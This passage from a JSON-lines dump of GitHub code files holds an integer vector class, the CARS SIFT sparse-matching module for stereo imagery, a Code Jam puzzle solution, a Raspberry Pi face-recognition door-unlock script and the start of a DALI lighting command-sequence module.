if isinstance(item, ivec):\n self.x /= item.x\n self.y /= item.y\n self.z /= item.z\n else:\n self.x /= item\n self.y /= item\n self.z /= item\n return self\n \n def add(self, item):\n if isinstance(item, ivec):\n self.x += item.x\n self.y += item.y\n self.z += item.z\n else:\n self.x += item\n self.y += item\n self.z += item\n return self\n \n def sub(self, item):\n if isinstance(item, ivec):\n self.x -= item.x\n self.y -= item.y\n self.z -= item.z\n else:\n self.x -= item\n self.y -= item\n self.z -= item\n return self\n \n def mask(self, n):\n self.x &= n\n self.y &= n\n self.z &= n\n return self\n","repo_name":"FraMecca/CipollaMod","sub_path":"src/cube2common/ivec.py","file_name":"ivec.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16921804295","text":"import logging\nimport math\nimport os\nfrom typing import Dict, Tuple\n\n# Third party imports\nimport numpy as np\nimport pandas\nimport xarray as xr\nfrom json_checker import And, Checker, Or\n\nimport cars.applications.sparse_matching.sparse_matching_constants as sm_cst\nimport cars.orchestrator.orchestrator as ocht\nfrom cars.applications import application_constants\n\n# CARS imports\nfrom cars.applications.sparse_matching import sparse_matching_tools\nfrom cars.applications.sparse_matching.sparse_matching import SparseMatching\nfrom cars.core import constants as cst\nfrom cars.core.utils import safe_makedirs\nfrom cars.data_structures import cars_dataset\n\n\nclass Sift(SparseMatching, short_name=\"sift\"):\n \"\"\"\n SparseMatching\n \"\"\"\n\n # pylint: disable=too-many-instance-attributes\n\n def __init__(self, conf=None):\n \"\"\"\n Init function of SparseMatching\n\n :param conf: configuration for matching\n :return: a application_to_use object\n \"\"\"\n\n super().__init__(conf=conf)\n\n # check conf\n self.used_method = self.used_config[\"method\"]\n self.disparity_margin = self.used_config[\"disparity_margin\"]\n self.elevation_delta_lower_bound = self.used_config[\n \"elevation_delta_lower_bound\"\n ]\n self.elevation_delta_upper_bound = self.used_config[\n \"elevation_delta_upper_bound\"\n ]\n self.epipolar_error_upper_bound = self.used_config[\n \"epipolar_error_upper_bound\"\n ]\n self.epipolar_error_maximum_bias = self.used_config[\n \"epipolar_error_maximum_bias\"\n ]\n\n # outlier filtering (used after application run, to filter matches)\n self.disparity_outliers_rejection_percent = self.used_config[\n \"disparity_outliers_rejection_percent\"\n ]\n\n # minimum number of matches to continue with\n self.minimum_nb_matches = self.used_config[\"minimum_nb_matches\"]\n\n # sifts\n self.sift_matching_threshold = self.used_config[\n \"sift_matching_threshold\"\n ]\n self.sift_n_octave = self.used_config[\"sift_n_octave\"]\n self.sift_n_scale_per_octave = self.used_config[\n \"sift_n_scale_per_octave\"\n ]\n self.sift_peak_threshold = self.used_config[\"sift_peak_threshold\"]\n self.sift_edge_threshold = self.used_config[\"sift_edge_threshold\"]\n self.sift_magnification = self.used_config[\"sift_magnification\"]\n self.sift_back_matching = self.used_config[\"sift_back_matching\"]\n\n # sifts filter\n self.matches_filter_knn = self.used_config[\"matches_filter_knn\"]\n self.matches_filter_dev_factor = self.used_config[\n \"matches_filter_dev_factor\"\n ]\n\n # Saving files\n self.save_matches = self.used_config[\"save_matches\"]\n\n # Init orchestrator\n self.orchestrator = None\n\n def check_conf(self, conf):\n \"\"\"\n Check configuration\n\n :param conf: configuration to check\n :type conf: dict\n\n :return: overloaded configuration\n :rtype: dict\n\n \"\"\"\n\n # init conf\n if conf is not None:\n overloaded_conf = conf.copy()\n else:\n conf = {}\n overloaded_conf = {}\n\n # Overload conf\n overloaded_conf[\"method\"] = conf.get(\"method\", \"sift\")\n overloaded_conf[\"disparity_margin\"] = conf.get(\"disparity_margin\", 0.02)\n overloaded_conf[\"elevation_delta_lower_bound\"] = conf.get(\n \"elevation_delta_lower_bound\", -9000\n )\n overloaded_conf[\"elevation_delta_upper_bound\"] = conf.get(\n \"elevation_delta_upper_bound\", 9000\n )\n overloaded_conf[\"epipolar_error_upper_bound\"] = conf.get(\n \"epipolar_error_upper_bound\", 10.0\n )\n overloaded_conf[\"epipolar_error_maximum_bias\"] = conf.get(\n \"epipolar_error_maximum_bias\", 0.0\n )\n # outliers rejections used for matches filtering\n overloaded_conf[\"disparity_outliers_rejection_percent\"] = conf.get(\n \"disparity_outliers_rejection_percent\", 0.1\n )\n\n # minimum number of matches to continue with\n overloaded_conf[\"minimum_nb_matches\"] = conf.get(\n \"minimum_nb_matches\", 100\n )\n\n # sifts params\n overloaded_conf[\"sift_matching_threshold\"] = conf.get(\n \"sift_matching_threshold\", 0.6\n )\n overloaded_conf[\"sift_n_octave\"] = conf.get(\"sift_n_octave\", 8)\n overloaded_conf[\"sift_n_scale_per_octave\"] = conf.get(\n \"sift_n_scale_per_octave\", 3\n )\n overloaded_conf[\"sift_peak_threshold\"] = conf.get(\n \"sift_peak_threshold\", None\n )\n overloaded_conf[\"sift_edge_threshold\"] = conf.get(\n \"sift_edge_threshold\", 5.0\n )\n overloaded_conf[\"sift_magnification\"] = conf.get(\n \"sift_magnification\", 2.0\n )\n overloaded_conf[\"sift_back_matching\"] = conf.get(\n \"sift_back_matching\", True\n )\n\n # sifts filter params\n overloaded_conf[\"matches_filter_knn\"] = conf.get(\n \"matches_filter_knn\", 25\n )\n overloaded_conf[\"matches_filter_dev_factor\"] = conf.get(\n \"matches_filter_dev_factor\", 3.0\n )\n\n # Saving files\n overloaded_conf[\"save_matches\"] = conf.get(\"save_matches\", False)\n self.save_matches = overloaded_conf[\"save_matches\"]\n\n sparse_matching_schema = {\n \"method\": str,\n \"disparity_margin\": float,\n \"disparity_outliers_rejection_percent\": And(\n float, lambda x: x >= 0, lambda x: x <= 1\n ),\n \"minimum_nb_matches\": And(int, lambda x: x > 0),\n \"elevation_delta_lower_bound\": Or(int, float, None),\n \"elevation_delta_upper_bound\": Or(int, float, None),\n \"epipolar_error_upper_bound\": And(float, lambda x: x > 0),\n \"epipolar_error_maximum_bias\": And(float, lambda x: x >= 0),\n \"sift_matching_threshold\": And(float, lambda x: x > 0),\n \"sift_n_octave\": And(int, lambda x: x > 0),\n \"sift_n_scale_per_octave\": And(int, lambda x: x > 0),\n \"sift_peak_threshold\": Or(float, None),\n \"sift_edge_threshold\": float,\n \"sift_magnification\": And(float, lambda x: x > 0),\n \"sift_back_matching\": bool,\n \"matches_filter_knn\": int,\n \"matches_filter_dev_factor\": Or(int, float),\n \"save_matches\": bool,\n }\n\n # Check conf\n checker = Checker(sparse_matching_schema)\n checker.validate(overloaded_conf)\n\n # Check consistency between bounds for elevation delta\n elevation_delta_lower_bound = overloaded_conf[\n \"elevation_delta_lower_bound\"\n ]\n elevation_delta_upper_bound = overloaded_conf[\n \"elevation_delta_upper_bound\"\n ]\n if None not in (\n elevation_delta_lower_bound,\n elevation_delta_upper_bound,\n ):\n if elevation_delta_lower_bound > elevation_delta_upper_bound:\n raise ValueError(\n \"Upper bound must be bigger than \"\n \"lower bound for expected elevation delta\"\n )\n\n return overloaded_conf\n\n def get_save_matches(self):\n \"\"\"\n Get save_matches parameter\n\n :return: true is save_matches activated\n :rtype: bool\n \"\"\"\n\n return self.save_matches\n\n def get_disparity_margin(self):\n \"\"\"\n Get disparity margin corresponding to sparse matches\n\n :return: margin in percent\n\n \"\"\"\n return self.disparity_margin\n\n def get_matches_filter_knn(self):\n \"\"\"\n Get matches_filter_knn :\n number of neighboors used to measure isolation of matches\n\n :return: matches_filter_knn\n\n \"\"\"\n return self.matches_filter_knn\n\n def get_matches_filter_dev_factor(self):\n \"\"\"\n Get matches_filter_dev_factor :\n factor of deviation in the formula\n to compute threshold of outliers\n\n :return: matches_filter_dev_factor\n\n \"\"\"\n return self.matches_filter_dev_factor\n\n def get_margins_fun(self, disp_min=None, disp_max=None):\n \"\"\"\n Get margins function to use in resampling\n\n :param disp_min: disp min for info\n :param disp_max: disp max for info\n\n :return: margins function\n :rtype: function generating xr.Dataset\n\n \"\"\"\n\n # Compute margins\n corner = [\"left\", \"up\", \"right\", \"down\"]\n data = np.zeros(len(corner))\n col = np.arange(len(corner))\n margins = xr.Dataset(\n {\"left_margin\": ([\"col\"], data)}, coords={\"col\": col}\n )\n margins[\"right_margin\"] = xr.DataArray(data, dims=[\"col\"])\n\n # Compute margins for right region\n margins[\"right_margin\"].data = [\n int(\n math.floor(\n self.epipolar_error_upper_bound\n + self.epipolar_error_maximum_bias\n )\n ),\n int(\n math.floor(\n self.epipolar_error_upper_bound\n + self.epipolar_error_maximum_bias\n )\n ),\n int(\n math.floor(\n self.epipolar_error_upper_bound\n + self.epipolar_error_maximum_bias\n )\n ),\n int(\n math.ceil(\n self.epipolar_error_upper_bound\n + self.epipolar_error_maximum_bias\n )\n ),\n ]\n\n # add disp range info\n margins.attrs[\"disp_min\"] = disp_min\n margins.attrs[\"disp_max\"] = disp_max\n\n logging.info(\n \"Margins added to right region for matching: {}\".format(\n margins[\"right_margin\"].data\n )\n )\n\n def margins_wrapper( # pylint: disable=unused-argument\n row_min, row_max, col_min, col_max\n ):\n \"\"\"\n Generates margins Dataset used in resampling\n\n :param row_min: row min\n :param row_max: row max\n :param col_min: col min\n :param col_max: col max\n\n :return: margins\n :rtype: xr.Dataset\n \"\"\"\n\n # Constant margins for all tiles\n return margins\n\n return margins_wrapper\n\n def run(\n self,\n epipolar_images_left,\n epipolar_images_right,\n disp_to_alt_ratio,\n orchestrator=None,\n pair_folder=None,\n pair_key=\"PAIR_0\",\n ):\n \"\"\"\n Run Matching application.\n\n Create left and right CarsDataset filled with pandas.DataFrame ,\n corresponding to epipolar 2D disparities, on the same geometry\n that epipolar_images_left and epipolar_images_right.\n\n :param epipolar_images_left: tiled left epipolar. CarsDataset contains:\n\n - N x M Delayed tiles \\\n Each tile will be a future xarray Dataset containing:\n\n - data with keys : \"im\", \"msk\", \"color\"\n - attrs with keys: \"margins\" with \"disp_min\" and \"disp_max\"\n \"transform\", \"crs\", \"valid_pixels\", \"no_data_mask\",\n \"no_data_img\"\n - attributes containing:\n \"largest_epipolar_region\",\"opt_epipolar_tile_size\"\n :type epipolar_images_left: CarsDataset\n :param epipolar_images_right: tiled right epipolar.CarsDataset contains:\n\n - N x M Delayed tiles \\\n Each tile will be a future xarray Dataset containing:\n\n - data with keys : \"im\", \"msk\", \"color\"\n - attrs with keys: \"margins\" with \"disp_min\" and \"disp_max\"\\\n \"transform\", \"crs\", \"valid_pixels\", \"no_data_mask\",\\\n \"no_data_img\"\n - attributes containing:\"largest_epipolar_region\", \\\n \"opt_epipolar_tile_size\"\n :type epipolar_images_right: CarsDataset\n :param disp_to_alt_ratio: disp to alti ratio\n :type disp_to_alt_ratio: float\n :param orchestrator: orchestrator used\n :param pair_folder: folder used for current pair\n :type pair_folder: str\n :param pair_key: pair key id\n :type pair_key: str\n\n :return left matches, right matches. Each CarsDataset contains:\n\n - N x M Delayed tiles \\\n Each tile will be a future pandas DataFrame containing:\n - data : (L, 4) shape matches\n - attributes containing \"disp_lower_bound\", \"disp_upper_bound\",\\\n \"elevation_delta_lower_bound\",\"elevation_delta_upper_bound\"\n\n :rtype: Tuple(CarsDataset, CarsDataset)\n \"\"\"\n\n # Default orchestrator\n if orchestrator is None:\n # Create default sequential orchestrator for current application\n # be awere, no out_json will be shared between orchestrators\n # No files saved\n self.orchestrator = ocht.Orchestrator(\n orchestrator_conf={\"mode\": \"sequential\"}\n )\n else:\n self.orchestrator = orchestrator\n\n if pair_folder is None:\n pair_folder = os.path.join(self.orchestrator.out_dir, \"tmp\")\n safe_makedirs(pair_folder)\n\n if epipolar_images_left.dataset_type == \"arrays\":\n # Create CarsDataset\n # Epipolar_disparity\n epipolar_disparity_map_left = cars_dataset.CarsDataset(\"points\")\n epipolar_disparity_map_left.create_empty_copy(epipolar_images_left)\n\n # Update attributes to get epipolar info\n epipolar_disparity_map_left.attributes.update(\n epipolar_images_left.attributes\n )\n # check sift_peak_threshold with image type\n # only if sift_peak_threshold is None\n tmp_sift_peak_threshold = self.sift_peak_threshold\n if not self.sift_peak_threshold:\n logging.info(\"The sift_peak_threshold is set to auto-mode.\")\n # sift_peak_threshold is None or not specified\n # check input type\n if np.issubdtype(\n epipolar_disparity_map_left.attributes[\"image_type\"],\n np.uint8,\n ):\n tmp_sift_peak_threshold = 1\n else:\n tmp_sift_peak_threshold = 20\n logging.info(\n \"The sift_peak_threshold will be set to {}.\".format(\n tmp_sift_peak_threshold\n )\n )\n self.sift_peak_threshold = tmp_sift_peak_threshold\n\n # Save disparity maps\n if self.save_matches:\n self.orchestrator.add_to_save_lists(\n os.path.join(pair_folder, \"epi_matches_left.tif\"),\n None,\n epipolar_disparity_map_left,\n cars_ds_name=\"epi_matches_left\",\n )\n\n # Get max window size\n image_tiling_grid = epipolar_images_left.tiling_grid\n\n max_window_col_size = np.max(\n image_tiling_grid[:, :, 3] - image_tiling_grid[:, :, 2]\n )\n\n # Compute disparity range\n if self.elevation_delta_lower_bound is None:\n disp_lower_bound = -np.inf\n min_offset = -image_tiling_grid.shape[0]\n else:\n disp_lower_bound = (\n self.elevation_delta_lower_bound / disp_to_alt_ratio\n )\n min_offset = math.floor(disp_lower_bound / max_window_col_size)\n if self.elevation_delta_upper_bound is None:\n disp_upper_bound = np.inf\n max_offset = image_tiling_grid.shape[0]\n else:\n disp_upper_bound = (\n self.elevation_delta_upper_bound / disp_to_alt_ratio\n )\n max_offset = math.ceil(disp_upper_bound / max_window_col_size)\n\n offsets = range(min_offset, max_offset + 1)\n\n attributes = {\n \"disp_lower_bound\": disp_lower_bound,\n \"disp_upper_bound\": disp_upper_bound,\n \"elevation_delta_lower_bound\": self.elevation_delta_lower_bound,\n \"elevation_delta_upper_bound\": self.elevation_delta_upper_bound,\n }\n\n epipolar_disparity_map_left.attributes.update(attributes)\n\n # Get saving infos in order to save tiles when they are computed\n [saving_info_left] = self.orchestrator.get_saving_infos(\n [epipolar_disparity_map_left]\n )\n\n # Update orchestrator out_json\n updating_infos = {\n application_constants.APPLICATION_TAG: {\n pair_key: {\n sm_cst.SPARSE_MATCHING_RUN_TAG: {\n sm_cst.DISP_LOWER_BOUND: disp_lower_bound,\n sm_cst.DISP_UPPER_BOUND: disp_upper_bound,\n },\n }\n }\n }\n orchestrator.update_out_info(updating_infos)\n logging.info(\n \"Generate disparity: Number tiles: {}\".format(\n epipolar_disparity_map_left.shape[1]\n * epipolar_disparity_map_left.shape[0]\n )\n )\n\n # Add to replace list so tiles will be readable at the same time\n self.orchestrator.add_to_replace_lists(\n epipolar_disparity_map_left, cars_ds_name=\"epi_matches_left\"\n )\n\n # Generate disparity maps\n for col in range(epipolar_disparity_map_left.shape[1]):\n for row in range(epipolar_disparity_map_left.shape[0]):\n # initialize list of matches\n delayed_matches_row_col = []\n # iterate on offsets\n for offset in offsets:\n if (\n 0\n <= col + offset\n < epipolar_disparity_map_left.shape[1]\n ):\n # Compute matches\n if type(None) not in (\n type(epipolar_images_left[row, col]),\n type(epipolar_images_right[row, col + offset]),\n ):\n delayed_matches_row_col.append(\n self.orchestrator.cluster.create_task(\n compute_matches, nout=1\n )(\n epipolar_images_left[row, col],\n epipolar_images_right[\n row, col + offset\n ],\n matching_threshold=(\n self.sift_matching_threshold\n ),\n n_octave=self.sift_n_octave,\n n_scale_per_octave=(\n self.sift_n_scale_per_octave\n ),\n peak_threshold=tmp_sift_peak_threshold,\n edge_threshold=self.sift_edge_threshold,\n magnification=self.sift_magnification,\n backmatching=self.sift_back_matching,\n disp_lower_bound=disp_lower_bound,\n disp_upper_bound=disp_upper_bound,\n )\n )\n\n # Merge matches corresponding to left tile\n if len(delayed_matches_row_col) > 0:\n # update saving_info with row and col\n full_saving_info_left = ocht.update_saving_infos(\n saving_info_left, row=row, col=col\n )\n\n (\n epipolar_disparity_map_left[row, col]\n ) = self.orchestrator.cluster.create_task(\n merge_matches, nout=1\n )(\n delayed_matches_row_col,\n saving_info_left=full_saving_info_left,\n )\n\n else:\n logging.error(\n \"SparseMatching application doesn't \"\n \"support this input data format\"\n )\n\n return epipolar_disparity_map_left, None\n\n def filter_matches(\n self,\n epipolar_matches_left,\n orchestrator=None,\n pair_key=\"pair_0\",\n pair_folder=None,\n save_matches=False,\n ):\n \"\"\"\n Transform matches CarsDataset to numpy matches, and filters matches\n\n :param cars_orchestrator: orchestrator\n :param epipolar_matches_left: matches. CarsDataset contains:\n\n - N x M Delayed tiles \\\n Each tile will be a future pandas DataFrame containing:\n\n - data : (L, 4) shape matches\n - attributes containing \"disp_lower_bound\", \"disp_upper_bound\", \\\n \"elevation_delta_lower_bound\",\"elevation_delta_upper_bound\"\n :type epipolar_matches_left: CarsDataset\n :param save_matches: true is matches needs to be saved\n :type save_matches: bool\n\n :return filtered matches\n :rtype: np.ndarray\n\n \"\"\"\n\n # Default orchestrator\n if orchestrator is None:\n # Create default sequential orchestrator for current application\n # be awere, no out_json will be shared between orchestrators\n # No files saved\n cars_orchestrator = ocht.Orchestrator(\n orchestrator_conf={\"mode\": \"sequential\"}\n )\n else:\n cars_orchestrator = orchestrator\n\n if pair_folder is None:\n pair_folder = os.path.join(cars_orchestrator.out_dir, \"tmp\")\n safe_makedirs(pair_folder)\n\n epipolar_error_upper_bound = self.epipolar_error_upper_bound\n epipolar_error_maximum_bias = self.epipolar_error_maximum_bias\n\n # Compute grid correction\n\n # Concatenated matches\n list_matches = []\n for row in range(epipolar_matches_left.shape[0]):\n for col in range(epipolar_matches_left.shape[1]):\n # CarsDataset containing Pandas DataFrame, not Delayed anymore\n list_matches.append(epipolar_matches_left[row, col])\n\n matches = pandas.concat(\n list_matches,\n ignore_index=True,\n sort=False,\n ).to_numpy()\n\n raw_nb_matches = matches.shape[0]\n\n logging.info(\n \"Raw number of matches found: {} matches\".format(raw_nb_matches)\n )\n\n # Export matches\n raw_matches_array_path = None\n if save_matches:\n logging.info(\"Writing raw matches file\")\n raw_matches_array_path = os.path.join(\n pair_folder, \"raw_matches.npy\"\n )\n np.save(raw_matches_array_path, matches)\n\n # Filter matches that are out of margin\n if epipolar_error_maximum_bias == 0:\n epipolar_median_shift = 0\n else:\n epipolar_median_shift = np.median(matches[:, 3] - matches[:, 1])\n\n matches = matches[\n ((matches[:, 3] - matches[:, 1]) - epipolar_median_shift)\n >= -epipolar_error_upper_bound\n ]\n matches = matches[\n ((matches[:, 3] - matches[:, 1]) - epipolar_median_shift)\n <= epipolar_error_upper_bound\n ]\n\n matches_discarded_message = \"{} matches discarded \\\n because their epipolar error is greater \\\n than --epipolar_error_upper_bound = {} pix\".format(\n raw_nb_matches - matches.shape[0], epipolar_error_upper_bound\n )\n\n if epipolar_error_maximum_bias != 0:\n matches_discarded_message += (\n \" considering a shift of {} pix\".format(epipolar_median_shift)\n )\n\n logging.info(matches_discarded_message)\n\n filtered_matches_array_path = None\n if save_matches:\n logging.info(\"Writing filtered matches file\")\n filtered_matches_array_path = os.path.join(\n pair_folder, \"filtered_matches.npy\"\n )\n np.save(filtered_matches_array_path, matches)\n\n # Retrieve number of matches\n nb_matches = matches.shape[0]\n\n # Check if we have enough matches\n # TODO: we could also make it a warning and continue\n # with uncorrected grid\n # and default disparity range\n if nb_matches < self.minimum_nb_matches:\n error_message_matches = (\n \"Insufficient amount of matches found ({} < {}), \"\n \"can not safely estimate epipolar error correction \"\n \" and disparity range\".format(\n nb_matches, self.minimum_nb_matches\n )\n )\n logging.error(error_message_matches)\n raise ValueError(error_message_matches)\n\n logging.info(\n \"Number of matches kept for epipolar \"\n \"error correction: {} matches\".format(nb_matches)\n )\n\n # Compute epipolar error\n epipolar_error = matches[:, 1] - matches[:, 3]\n epi_error_mean = np.mean(epipolar_error)\n epi_error_std = np.std(epipolar_error)\n epi_error_max = np.max(np.fabs(epipolar_error))\n logging.info(\n \"Epipolar error before correction: mean = {:.3f} pix., \"\n \"standard deviation = {:.3f} pix., max = {:.3f} pix.\".format(\n epi_error_mean,\n epi_error_std,\n epi_error_max,\n )\n )\n\n # Update orchestrator out_json\n raw_matches_infos = {\n application_constants.APPLICATION_TAG: {\n pair_key: {\n sm_cst.MATCHES_FILTERING_TAG: {\n sm_cst.RAW_MATCHES_TAG: raw_matches_array_path,\n sm_cst.FILTERED_MATCHES_TAG: (\n filtered_matches_array_path\n ),\n sm_cst.NUMBER_MATCHES_TAG: nb_matches,\n sm_cst.RAW_NUMBER_MATCHES_TAG: raw_nb_matches,\n sm_cst.BEFORE_CORRECTION_EPI_ERROR_MEAN: epi_error_mean,\n sm_cst.BEFORE_CORRECTION_EPI_ERROR_STD: epi_error_std,\n sm_cst.BEFORE_CORRECTION_EPI_ERROR_MAX: epi_error_max,\n }\n }\n }\n }\n cars_orchestrator.update_out_info(raw_matches_infos)\n\n return matches\n\n\ndef compute_matches(\n left_image_object: xr.Dataset,\n right_image_object: xr.Dataset,\n matching_threshold=None,\n n_octave=None,\n n_scale_per_octave=None,\n peak_threshold=None,\n edge_threshold=None,\n magnification=None,\n backmatching=None,\n disp_lower_bound=None,\n disp_upper_bound=None,\n) -> Dict[str, Tuple[xr.Dataset, xr.Dataset]]:\n \"\"\"\n Compute matches from image objects.\n This function will be run as a delayed task.\n\n User must provide saving infos to save properly created datasets\n\n :param left_image_object: tiled Left image dataset with :\n\n - cst.EPI_IMAGE\n - cst.EPI_MSK (if given)\n - cst.EPI_COLOR (for left, if given)\n :type left_image_object: xr.Dataset with :\n\n - cst.EPI_IMAGE\n - cst.EPI_MSK (if given)\n - cst.EPI_COLOR (for left, if given)\n :param right_image_object: tiled Right image\n :type right_image_object: xr.Dataset\n\n\n :return: Left matches object, Right matches object (if exists)\n\n Returned objects are composed of :\n\n - dataframe (None for right object) with :\n - TODO\n \"\"\"\n\n # Create mask\n # TODO : remove overwriting of EPI_MSK\n saved_left_mask = np.copy(left_image_object[cst.EPI_MSK].values)\n saved_right_mask = np.copy(right_image_object[cst.EPI_MSK].values)\n\n # Compute matches\n matches = sparse_matching_tools.dataset_matching(\n left_image_object,\n right_image_object,\n matching_threshold=matching_threshold,\n n_octave=n_octave,\n n_scale_per_octave=n_scale_per_octave,\n peak_threshold=peak_threshold,\n edge_threshold=edge_threshold,\n magnification=magnification,\n backmatching=backmatching,\n )\n\n # Filter matches outside disparity range\n if disp_lower_bound is not None and disp_upper_bound is not None:\n filtered_nb_matches = matches.shape[0]\n\n matches = matches[matches[:, 2] - matches[:, 0] >= disp_lower_bound]\n matches = matches[matches[:, 2] - matches[:, 0] <= disp_upper_bound]\n\n logging.debug(\n \"{} matches discarded because they fall outside of disparity range \"\n \"defined by --elevation_delta_lower_bound and \"\n \"--elevation_delta_upper_bound: [{} pix., {} pix.]\".format(\n filtered_nb_matches - matches.shape[0],\n disp_lower_bound,\n disp_upper_bound,\n )\n )\n else:\n logging.debug(\"Matches outside disparity range were not filtered\")\n\n # convert to Dataframe\n left_matches_dataframe = pandas.DataFrame(matches)\n\n # recover initial mask data in input images\n # TODO remove with proper dataset creation\n left_image_object[cst.EPI_MSK].values = saved_left_mask\n right_image_object[cst.EPI_MSK].values = saved_right_mask\n\n return left_matches_dataframe\n\n\ndef merge_matches(list_of_matches, saving_info_left=None):\n \"\"\"\n Concatenate matches\n\n :param list_of_matches: list of matches\n :type list_of_matches: list(pandas.DataFrame)\n\n \"\"\"\n concatenated_matches = pandas.concat(\n list_of_matches,\n ignore_index=True,\n sort=False,\n )\n\n cars_dataset.fill_dataframe(\n concatenated_matches, saving_info=saving_info_left, attributes=None\n )\n\n return concatenated_matches\n","repo_name":"CNES/cars","sub_path":"cars/applications/sparse_matching/sift.py","file_name":"sift.py","file_ext":"py","file_size_in_byte":30671,"program_lang":"python","lang":"en","doc_type":"code","stars":202,"dataset":"github-code","pt":"61"} +{"seq_id":"23418302371","text":"# GCJ Magic Trick\n\n## file io template\ninput = \"magician.in\"\noutput = \"magician.out\"\ndef fread(filename):\n with open(filename, \"r\") as fin:\n for line in fin:\n yield line.strip().split()\n\ndef fwrite(line):\n with open(output, 'a') as fout:\n fout.write(line)\n if \"\\n\" not in line:\n fout.write(\"\\n\")\n\nread = fread(input).next\n## end template\n\nT = int(read()[0])\n\nfor testcase in xrange(T):\n firstrownum = int(read()[0]) - 1\n for i in xrange(firstrownum):\n read() # skip lines until row chosen\n candidates = set(map(int, read()))\n for i in xrange(3-firstrownum):\n read() # skip rows after\n secondrownum = int(read()[0]) - 1\n for i in xrange(secondrownum):\n read() # skip lines until row chosen\n candidates &= set(map(int, read()))\n for i in xrange(3-secondrownum):\n read() # skip rows after\n overlap = len(candidates)\n if overlap == 1:\n fwrite(\"Case #\" + str(testcase+1) + \": \" + str(candidates.pop()))\n elif overlap == 0:\n fwrite(\"Case #\" + str(testcase+1) + \": Volunteer cheated!\")\n else:\n fwrite(\"Case #\" + str(testcase+1) + \": Bad magician!\")","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/3956.py","file_name":"3956.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40217091382","text":"# detector_webcam.py\n# Finding the person in front of the camera is anyone who stored in database\n# Using USB webcam or IP Cam (single threading)\n#\n# Project: Face Recognition using OpenCV and Raspberry Pi\n# Ref: https://www.pytorials.com/face-recognition-using-opencv-part-3/\n# By: Mickey Chan @ 2019\n\n# Import required modules\nimport cv2\nimport os\nimport sqlite3\nimport RPi.GPIO as GPIO\nimport time\n\n# Connect SQLite3 database\nconn = sqlite3.connect('database.db')\ndb = conn.cursor()\n\n# Assign the training data file\nfname = \"recognizer/trainingData.yml\"\nif not os.path.isfile(fname):\n print(\"Please train the data first\")\n exit(0)\n\n# Setup GPIO for door lock\nrelayPin = 26\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(relayPin, GPIO.OUT)\nGPIO.output(relayPin, 0)\n\nlastDetectedAt = 0\ndetectInterval = 5 # 1/n second, for reducing overhead\nlastUnlockedAt = 0\nunlockDuration = 5 # n second\n\n# Font used for display\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\n# Connect to video source\n#vSource = \"rtsp://192.168.1.100:8554/live.sdp\" # RTSP URL of IP Cam\nvSource = 0 # first USB webcam\nvStream = cv2.VideoCapture(vSource)\n\n# Setup Classifier for detecting face\nfaceCascade = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n# Setup LBPH recognizer for face recognition\nrecognizer = cv2.face.createLBPHFaceRecognizer() # or LBPHFaceRecognizer_create()\n# Load training data\nrecognizer.load(fname) # change to read() for LBPHFaceRecognizer_create()\n\nwhile vStream.isOpened():\n # Lock the door again when timeout\n if time.time() - lastUnlockedAt > unlockDuration:\n GPIO.output(relayPin, 0)\n \n ok, frame = vStream.read() # Read frame\n if not ok: break\n \n timeElapsed = time.time() - lastDetectedAt\n if timeElapsed > 1./detectInterval:\n lastDetectedAt = time.time()\n \n # Detect face\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # Convert captured frame to grayscale\n faces = faceCascade.detectMultiScale(gray, scaleFactor = 1.3, minNeighbors = 5) # Detect face(s) inside the frame\n \n for (x, y, w, h) in faces:\n # Try to recognize the face using recognizer\n roiGray = gray[y:y+h, x:x+w]\n id_, conf = recognizer.predict(roiGray)\n print(id_, conf)\n \n # If recognized face has enough confident (<= 70),\n # retrieve the user name from database,\n # draw a rectangle around the face,\n # print the name of the user and\n # unlock the door for 5 secords\n if conf <= 70:\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\n # retrieve user name from database\n db.execute(\"SELECT `name` FROM `users` WHERE `id` = (?);\", (id_,))\n result = db.fetchall()\n name = result[0][0]\n \n # You may do anything below for detected user, e.g. unlock the door\n GPIO.output(relayPin, 1) # Unlock\n lastUnlockedAt = time.time()\n print(\"[Unlock] \" + str(id_) + \":\" + name + \" (\" + str(conf) + \")\")\n cv2.putText(frame, name, (x+2,y+h-5), font, 1, (150,255,0), 2)\n else:\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 0, 255), 2)\n GPIO.output(relayPin, 0) # Lock the door if not enough confident\n #print(\"[Lock] \" + name + \" \" + str(conf))\n #cv2.putText(frame, 'No Match', (x+2,y+h-5), font, 1, (0,0,255), 2)\n \n cv2.imshow(\"Face Recognizer\", frame)\n \n # Press ESC or 'q' to quit the program\n key = cv2.waitKey(1) & 0xff\n if key == 27 or key == ord('q'):\n break\n\n# Clean up\nvStream.release()\nconn.close()\ncv2.destroyAllWindows()\nGPIO.cleanup()\nprint(\"END\")\n","repo_name":"mickey9801/opencv_facerecognition","sub_path":"detector_webcam.py","file_name":"detector_webcam.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"25490519663","text":"# Useful sequences of commands\n\n# These command sequences can be passed to a driver for execution as a\n# transaction.\n\n# A command sequence is a generator co-routine. It yields a series of\n# objects, and optionally returns a result.\n\n# The command sequence can yield the following types of object:\n#\n# * dali.command.Command instances for execution; the response must be\n# passed back into the sequence via .send() on the generator\n#\n# * dali.sequence.sleep instances to request a delay in execution\n#\n# * dali.sequence.progress instances to provide updates on sequence execution\n\n# Sequences may raise exceptions, which the driver should pass to the\n# caller.\n\nfrom dali.exceptions import DALISequenceError, ProgramShortAddressFailure\n\nfrom dali.gear.general import *\nfrom dali.address import Broadcast, Short\n\n\nclass sleep:\n \"\"\"Delay for a while\n\n Yielded during a sequence to request that the caller wait for at\n least the specified length of time in seconds\n \"\"\"\n def __init__(self, delay):\n self.delay = delay\n\n\nclass progress:\n \"\"\"Progress information\n\n Yielded during a sequence to indicate how the sequence is\n proceeding. May indicate an amount of progress, a message, or\n both. The amount of progress is just an indication and there is\n no guarantee that it will not decrease as well as increase.\n \"\"\"\n def __init__(self, message=None, 